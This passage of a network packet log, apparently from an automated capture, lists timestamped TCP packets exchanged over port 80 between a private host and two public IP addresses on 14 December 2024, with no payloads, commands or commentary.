Dec 14, 2024 12:56:34.987412930 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.987472057 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.987500906 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.987549067 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.988584042 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.988635063 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.988708019 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.988759995 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.989761114 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.989949942 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.990001917 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.991045952 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.991139889 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.991199017 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.992122889 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.992175102 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.992248058 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.992296934 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.993298054 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.993347883 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.993470907 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.993516922 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.994509935 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.994632959 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.994683981 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.995647907 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.995699883 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.995776892 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.995826006 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.996809959 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.996891975 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.996964931 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.997010946 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.998025894 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.998076916 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.998137951 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.998219967 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.999191999 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.999242067 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.999299049 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.999349117 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.000355005 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.000467062 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.000515938 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.001523018 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.001633883 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.001652002 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.001698017 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.002751112 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.002799988 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.002823114 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.002923012 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.004031897 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.004084110 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.004144907 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.004194021 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.005184889 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.005279064 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.005280972 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.005326033 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.006248951 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.006318092 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.006371975 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.006419897 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.007401943 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.007473946 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.007525921 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.007631063 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.008590937 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.008663893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.008737087 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.008786917 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.009834051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.009887934 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.009973049 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.010020971 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.010929108 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.010979891 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.011065960 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.011115074 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.012113094 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.012168884 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.012237072 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.012290001 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.013328075 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.013423920 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.013439894 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.013489008 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.014477968 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.014700890 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.014755964 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.014755964 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.015690088 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.015814066 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.015865088 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.016829967 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.016880989 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.016951084 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.017049074 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.018026114 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.018085957 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.018131018 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.018183947 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.019188881 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.019247055 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.019290924 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.019344091 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.020363092 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.020417929 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.020489931 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.020540953 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.021559954 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.021625042 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.021683931 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.021740913 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.022753954 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.022810936 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.022871017 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.022924900 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.023915052 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.023971081 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.024070978 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.024122000 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.025146008 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.025264978 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.025316000 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.026252985 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.026397943 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.026479006 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.027458906 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.027519941 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.027591944 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.027646065 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.028664112 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.028753042 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.028779030 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.028831959 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.029789925 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.029927969 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.029983997 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.030977011 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.031035900 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.031131029 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.031184912 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.032160997 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.032217979 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.032275915 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.032332897 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.033343077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.033391953 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.033468008 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.033555984 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.034497976 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.034553051 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.034625053 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.034677982 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.035679102 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.035790920 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.035846949 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.036847115 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.036921978 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.036977053 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.037028074 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.038052082 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.038173914 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.038233042 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.039155960 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.039705038 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.107018948 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:35.107209921 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:35.107441902 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:35.107471943 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:35.107505083 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:35.107554913 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:35.107702017 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:35.169981956 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.170036077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.170111895 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.170464039 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.170521021 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.170538902 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.170587063 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.170595884 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.170639992 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.171740055 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.171804905 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.171825886 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.171881914 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.172955990 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.172992945 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.173038960 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.174026012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.174062014 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.174072981 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.174104929 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.175132990 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.175179958 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.175205946 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.175249100 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.176352978 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.176431894 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.176436901 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.176479101 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.177505970 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.177561998 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.177582026 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.177606106 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.178658009 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.178721905 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.178854942 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.178910971 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.179832935 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.179883003 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.179925919 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.179968119 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.180994034 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.181031942 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.181132078 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.181178093 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.182173967 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.182225943 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.182292938 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.182441950 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.183371067 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.183422089 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.183489084 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.183697939 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.184561014 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.184611082 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.184614897 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.184659004 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.185734987 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.185792923 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.185869932 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.186116934 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.186882019 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.187097073 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.187134027 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.187150002 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.188086033 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.188203096 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.188252926 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.189280033 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.189327002 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.189394951 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.189439058 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.190464020 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.190546036 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.190613031 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.191596031 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.191734076 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.191778898 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.192776918 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.192822933 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.193018913 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.193063974 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.194046021 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.194102049 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.194180965 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.194226027 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.195272923 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.195400000 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.195450068 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.196288109 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.196388006 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.196542978 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.196614027 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.197561979 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.197613955 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.197653055 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.197696924 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.198637009 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.198683023 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.198760986 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.198803902 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.199810982 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.200062990 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.200110912 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.201209068 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.201255083 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.201438904 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.201484919 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.202358961 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.202394009 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.202406883 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.202438116 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.203376055 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.203471899 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.203516006 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.204543114 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.204590082 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.204649925 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.204695940 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.205765009 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.205807924 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.205893993 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.205940008 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.206897020 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.206949949 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.207104921 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.207151890 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.208092928 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.208139896 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.208192110 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.208235025 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.209342957 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.209435940 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.209490061 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.210438013 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.210490942 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.210604906 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.210661888 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.211647034 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.211726904 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.211745024 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.211788893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.212825060 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.212889910 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.213010073 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.213082075 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.213973999 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.214026928 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.214121103 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.214163065 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.215102911 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.215250969 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.215296984 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.216350079 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.216396093 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.216438055 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.216484070 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.217478991 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.217531919 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.217573881 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.217618942 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.218652964 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.218705893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.218739033 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.218801975 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.219845057 CET	80	49827	185.215.113.16	192.168.2.4
